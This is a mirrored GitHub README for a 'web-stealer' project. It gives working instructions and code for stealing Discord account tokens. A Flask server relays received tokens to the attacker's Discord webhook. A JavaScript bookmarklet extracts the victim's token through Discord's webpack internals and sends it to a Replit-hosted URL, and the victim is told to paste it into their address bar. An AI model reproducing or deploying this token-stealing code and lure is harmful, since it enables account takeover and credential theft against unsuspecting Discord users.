Giter VIP home page Giter VIP logo

web-stealer's Introduction

went downgrade a lil bit but the code works now as of 2/16/2024, this used to be more advanced and better, but some methods have been limited and dont work, this is the only part of the code that actually works now.

instructions:

  1. sign up for replit.com and create a new python repl
  2. paste this code:
from dhooks import Webhook
from flask import Flask, redirect
e = "PASTE_WEBHOOK_HERE"
app = Flask(__name__)
hook = Webhook(e)
@app.route('/<string:token>')
def index(token):
  hook.send(token)
  return redirect("https://discord.com/app")

if __name__ == "__main__":
  app.run(host='0.0.0.0', port=81)
  1. replace PASTE_WEBHOOK_HERE with your actual discord webhook.
  2. click run and then copy the url
  3. replace PASTE_URL_HERE with the url you just copied
const url = 'PASTE_URL_HERE';
var f = (webpackChunkdiscord_app.push([[''], {}, e=> {
  m = [];
  for (let c in e.c) m.push(e.c[c]);
}]), m).find(m => m?.exports?.default?.getToken !== undefined).exports.default.getToken();
window.location.replace(url + '/' + f);
  1. copy the whole code (the short one) and then go to https://minify-js.com/ and minify the code
  2. then put ur code like this: javascript:(your minified code)
  3. will look something like this: javascript:const url="https://b707bed2-0d5d-4175-a39f-44929c4f2e6c-00-boj7lelqbogw.kirk.replit.dev/";var f=(webpackChunkdiscord_app.push([[""],{},e=>{m=[];for(let o in e.c)m.push(e.c[o])}]),m).find((e=>void 0!==e?.exports?.default?.getToken)).exports.default.getToken();window.location.replace(url+"/"+f);
  4. paste and enter that code in your url tab on discord
  5. if need help make a issue

web-stealer's People

Contributors

i-skid avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.